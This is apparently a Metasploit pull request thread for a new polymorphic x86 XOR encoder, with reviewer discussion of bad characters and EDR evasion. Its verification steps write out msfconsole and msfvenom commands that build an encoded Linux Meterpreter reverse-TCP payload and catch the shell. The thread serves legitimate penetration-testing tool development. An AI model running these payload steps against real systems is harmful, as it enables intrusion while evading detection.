Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean #17401
…p clean, msftidy clean, No documentation written
Remove outdated comments
…isters, change name to xor_poly.rb
…l regs to preserve them
Updated PR description to make things easier to read.
This is neat stuff, thank you. Any chance of an x64 version for parity (and utility, not a lot of x86 targets around anymore and WOW64 tends to "count toward badness score" by EDR from what I've seen)? 😄
Hey @sempervictus, I'm really glad you appreciate it!
After some testing, the same code cannot be used for x64, since it needs a little bit of tweaking with instruction sizes and the register permutations.
@araout42 - thank you sir, encoders are long-lived tools in the satchel so the more working ones we have, the merrier.
Hi there, @araout42; this looks great. In your verification steps, you invoke this with
Please let me know if I'm missing something.
First, you are right, I did change the name from The second is that it cannot find a proper permutation without badchars.
The error message is given by the encoder and says that no permutation has been found with this badchar set, so it is working properly. But I can implement another polymorphism routine to be able to handle these badchars as well ^^ As of now I also changed my first message using only the opcodes.
Sweet; thanks, @araout42. I appreciate the quick answer! If I can't get it to work in the example and default setting, I usually assume there's a setup step or something else that I've missed. In this case, given the changing feature set, it makes sense the old example
No problem and thank you. Well, I'd be happy to implement this minor change you've mentioned earlier :)
It was a minor thing I noticed, but I wanted to get everything working and do a deeper dive to make sure that there was nothing else I saw. I don't want to keep asking you to change things, so I'll try and get all the requested changes to you all at once. We appreciate your time and don't want to waste it!
Creating payload
Getting callback
So it turns out the minor thing I was going to have you fix was actually right, and I just misread it. Another reason to make sure I get it working before I suggest a fix 😆.
The only thing I see is this minor typo.
Thank you, well it seems perfect.
I would definitely leave the comments, especially with something this complex.
Co-authored-by: Brendan <bwatters@rapid7.com>
…framework into New_x86_xor_encoder
Well, I've reread everything and made slight changes to the comments.
Create payload
Collect Shell:
Release Notes
This PR adds a new x86 XOR polymorphic encoder.
Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean. It has 100% polymorphism, all the bytes change from one generation to another. Probably should be ranked as excellent since it has many, many permutations for badchars.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set payload linux/x86/meterpreter/reverse_tcp
exploit
expected: Started listener ...
./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.01 LPORT=4444 -f elf -e x86/xor_poly -b "\x00\x90" > /tmp/Test && chmod +x /tmp/Test
/tmp/Test
expected: Connect to listener and give meterpreter session as in the video 2022-12-20.16-13-46.mov